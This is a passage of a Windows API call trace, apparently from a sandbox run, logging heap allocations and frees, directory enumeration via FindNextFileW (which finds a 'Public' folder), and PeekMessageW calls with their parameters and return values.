(HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0178.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0178.514] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0178.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0178.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0178.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0178.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x498) returned 0x2d301d0 [0178.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0178.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ba8 [0178.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a18 [0178.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27900 [0178.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0178.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27838 [0178.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27770 [0178.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27810 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27860 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c20 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27bd0 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27cc0 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27d10 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279f0 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27928 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27978 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ae0 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b08 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b30 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84da8 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84de0 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84e18 [0178.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84e50 [0178.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0178.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0178.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0178.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ab8 | out: hHeap=0x6a0000) returned 1 [0178.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27bf8 | out: hHeap=0x6a0000) returned 1 [0178.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279a0 | out: hHeap=0x6a0000) returned 1 [0178.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c70 | out: hHeap=0x6a0000) returned 1 [0178.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b80 | out: hHeap=0x6a0000) returned 1 [0178.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ec8 | out: hHeap=0x6a0000) returned 1 [0178.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ea0 | out: hHeap=0x6a0000) returned 1 [0178.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27e78 | out: hHeap=0x6a0000) returned 1 [0178.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27e50 | out: hHeap=0x6a0000) returned 1 [0178.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27e28 | out: hHeap=0x6a0000) returned 1 [0178.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27e00 | out: hHeap=0x6a0000) returned 1 [0178.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27dd8 | out: hHeap=0x6a0000) returned 1 [0178.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27db0 | out: hHeap=0x6a0000) returned 1 [0178.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27d88 | out: hHeap=0x6a0000) returned 1 [0178.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27d60 | out: hHeap=0x6a0000) returned 1 [0178.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27d38 | out: hHeap=0x6a0000) returned 1 [0178.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0178.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27888 | out: hHeap=0x6a0000) returned 1 [0178.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c98 | out: hHeap=0x6a0000) returned 1 [0178.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27950 | out: hHeap=0x6a0000) returned 1 [0178.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c48 | out: hHeap=0x6a0000) returned 1 [0178.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c18 | out: hHeap=0x6a0000) returned 1 [0178.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cf8 | out: hHeap=0x6a0000) returned 1 [0178.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0178.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0178.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2feb8 | out: hHeap=0x6a0000) returned 1 [0178.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0178.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0178.526] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0178.526] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0178.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f18 | out: hHeap=0x6a0000) returned 1 [0178.526] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f18 [0178.526] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c48 | out: hHeap=0x6a0000) returned 1 [0178.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c48 | out: hHeap=0x6a0000) returned 1 [0178.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c48 | out: hHeap=0x6a0000) returned 1 [0178.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c48 | out: hHeap=0x6a0000) returned 1 [0178.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c48 | out: hHeap=0x6a0000) returned 1 [0178.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c48 | out: hHeap=0x6a0000) returned 1 [0178.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c48 | out: hHeap=0x6a0000) returned 1 [0178.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c48 | out: hHeap=0x6a0000) returned 1 [0178.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c48 | out: hHeap=0x6a0000) returned 1 [0178.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c48 | out: hHeap=0x6a0000) returned 1 [0178.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c48 | out: hHeap=0x6a0000) returned 1 [0178.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c48 | out: hHeap=0x6a0000) returned 1 [0178.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f18 | out: hHeap=0x6a0000) returned 1 [0178.536] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0178.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0178.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f40 | out: hHeap=0x6a0000) returned 1 [0178.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ef0 | out: hHeap=0x6a0000) returned 1 [0178.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0178.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0178.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a90 | out: hHeap=0x6a0000) returned 1 [0178.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c40050 | out: hHeap=0x6a0000) returned 1 [0178.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.540] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 